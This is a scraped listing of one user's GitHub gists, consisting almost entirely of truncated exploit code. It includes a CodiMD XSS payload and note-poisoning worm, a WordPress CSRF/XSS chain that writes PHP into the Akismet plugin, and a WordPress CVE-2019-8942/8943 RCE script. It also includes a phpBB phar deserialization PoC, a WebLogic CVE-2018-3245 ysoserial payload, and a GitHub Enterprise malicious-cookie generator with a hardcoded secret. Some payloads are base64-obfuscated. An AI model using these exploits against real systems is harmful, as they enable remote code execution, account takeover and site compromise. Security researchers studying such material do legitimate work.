allyshka / xss-payload.js
Created Apr 25, 2019
CodiMD > 1.3.0 XSS payload
<!-- attr="-->
<script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js>
</script>
<div ng-app>
{{constructor.constructor('eval(atob(\'dmFyIGhvc3Q9ZG9jdW1lbnQubG9jYXRpb24uaG9zdG5hbWUrIjoiK2RvY3VtZW50LmxvY2F0aW9uLnBvcnQsbm90ZWR1bW15PSIvLyIraG9zdCsiL3NvY2tldC5pby8/bm90ZUlkPU5PVEVfSUQmRUlPPTMiLHBheWxvYWQ9Ilx4M2MhLS0gYXR0cj1cIi0tXHgzZTxzY3JpcHQgc3JjPWh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuZ3VsYXIuanMvMS4wLjEvYW5ndWxhci5taW4uanM+PFwvc2NyaXB0PjxkaXYgbmctYXBwPnt7Y29uc3RydWN0b3IuY29uc3RydWN0b3IoJ2FsZXJ0KDEpJykoKX19PC9kaXY+XCIgLS1ceDNlXG4iOyQuZ2V0KCIvbWUiLGZ1bmN0aW9uKG8peyJvayI9PW8uc3RhdHVzJiYkLmdldCgiL2hpc3RvcnkiLGZ1bmN0aW9uKG8pe2lmKDA8by5oaXN0b3J5Lmxlbmd0aClmb3IoaCBpbiBvLmhpc3RvcnkpeyFmdW5jdGlvbihvKXt2YXIgdD1pby5jb25uZWN0KHtwYXRoOiIvc29ja2V0LmlvLyIscXVlcnk6e25vdGVJZDpvfSx0aW1lb3V0OjVlMyxyZWNvbm5lY3Rpb25BdHRlbXB0czoyMCxmb3JjZU5ldzohMH0pO3Qub24oImNvbm5lY3QiLGZ1bmN0aW9uKG8pe30pLHQub25jZSgiZG9jIixmdW5jdGlvbihvKXtjb25zb2xlLmxvZyhvLnN0ciksLTE9PW8uc3RyLnNlYXJjaCgibmctYXBwIikmJnQuZW1
allyshka / codimd-notes-poison.js
Created Apr 25, 2019
CodiMD > 1.3.0: add XSS to all user notes from history
var host = document.location.hostname + ':' + document.location.port;
var notedummy = '//'+host+'/socket.io/?noteId=NOTE_ID&EIO=3';
var payload = '<!-- attr="--><script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.min.js></script><div ng-app>{{constructor.constructor(\'alert(1)\')()}}</div>" -->\n';
$.get('/me', function(data){
if(data.status=="ok") {
$.get('/history', function(data) {
if(data.history.length > 0) {
for(h in data.history) {
var currentNoteId = data.history[h].id;
allyshka / csrf.html
Last active Apr 28, 2019
WordPress <= 5.1 PoC: Akismet plugin index.php edit through CSRF
<html>
<body>
<form action="http://wpxss.vh/wp-comments-post.php" method="POST">
<input type="text" name="comment" value="&lt;a title=&apos;xss&quot; style=left:0;top:0;position:fixed;display:block;width:1000%;height:1000% onmousemove=eval(atob(&quot;dmFyIGV4cGxvaXQ9ZnVuY3Rpb24oKXt2YXIgbz0iIjtjb25zb2xlLmxvZygiR2V0IG5vbmNlIHRva2VuLiIpLGpRdWVyeS5nZXQoIi93cC1hZG1pbi9wbHVnaW4tZWRpdG9yLnBocD9wbHVnaW49YWtpc21ldC9pbmRleC5waHAmU3VibWl0PVNlbGVjdCIsZnVuY3Rpb24oZSl7aWYobz1qUXVlcnkoZSkuZmluZCgiI3RlbXBsYXRlICNub25jZSIpLnZhbCgpKXtjb25zb2xlLmxvZygiU3VjY2VzcyEgbm9uY2U6ICIrbyk7dmFyIG49e25vbmNlOm8sbmV3Y29udGVudDoiPD9waHAgcGhwaW5mbygpOy8qIixhY3Rpb246ImVkaXQtdGhlbWUtcGx1Z2luLWZpbGUiLGZpbGU6ImFraXNtZXQvaW5kZXgucGhwIixwbHVnaW46ImFraXNtZXQvYWtpc21ldC5waHAiLCJkb2NzLWxpc3QiOiIifTtjb25zb2xlLmxvZygiQWRkIFBIUCBjb2RlIHRvIHBsdWdpbiBmaWxlLiIpLGpRdWVyeS5wb3N0KCIvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAiLG4sZnVuY3Rpb24oZSl7Y29uc29sZS5sb2coIlN1Y2Nlc3MhIiksd2luZG93Lm9wZW4oIi93cC1jb250ZW50L3BsdWdpbnMvYWtpc21ldC8iKX0pfX0pfSxoPWRvY3VtZW50Lmdld
allyshka / akismet-xss-edit.js
Created Apr 10, 2019
WordPress Akismet plugin index.php edit
var exploit = function() {
var nonce = '';
var phpcode = '<?php phpinfo();/*';
var pluginurl = '/wp-admin/plugin-editor.php?plugin=akismet/index.php&Submit=Select';
var pluginupdateurl = '/wp-admin/admin-ajax.php';
var file = "akismet/index.php";
var plugin = "akismet/akismet.php";
console.log("Get nonce token.");
jQuery.get(pluginurl, function(data) {
nonce = jQuery(data).find('#template #nonce').val();
allyshka / wordpress-rce.js
Created Mar 1, 2019
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
allyshka / poc.js
Created Dec 12, 2018
phpBB <= 3.2.3 Admin to RCE PoC
// All greets go to RIPS Tech
// Run this JS on Attachment Settings ACP page
var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
// your payload here
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00
allyshka / JRMPClient_20180718_bypass01.java
Created Oct 25, 2018
CVE-2018-3245: JRMPClient payload to bypass the CVE-2018-2628 patch
// All respect goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;
import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
allyshka / script-loader.calls
Created Apr 5, 2018
All add method calls from script-loader.php
070: $scripts->add( 'utils', "/wp-includes/js/utils$suffix.js" );
...
078: $scripts->add( 'common', "/wp-admin/js/common$suffix.js", array('jquery', 'hoverIntent', 'utils'), false, 1 );
...
086: $scripts->add( 'wp-a11y', "/wp-includes/js/wp-a11y$suffix.js", array( 'jquery' ), false, 1 );
...
088: $scripts->add( 'sack', "/wp-includes/js/tw-sack$suffix.js", array(), '1.6.1', 1 );
...
090: $scripts->add( 'quicktags', "/wp-includes/js/quicktags$suffix.js", array(), false, 1 );
...
allyshka / gitentcookiegen.rb
Created Mar 22, 2017
GitHub Enterprise 2.8.0 < 2.8.6 evil cookie generator
require "openssl"
require "cgi"
SECRET = "641dd6454584ddabfed6342cc66281fb"
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
cmd = "uname -a > /tmp/owned" # change me
erubis = Erubis::Eruby.allocate
allyshka / gitentcookiedecrypt.rb
Last active Mar 9, 2019
GitHub Enterprise cookie decryption with default secret key
require "cgi"
require "openssl"
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)
loaddata = data.unpack('m').first
hmac = cookie.last
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"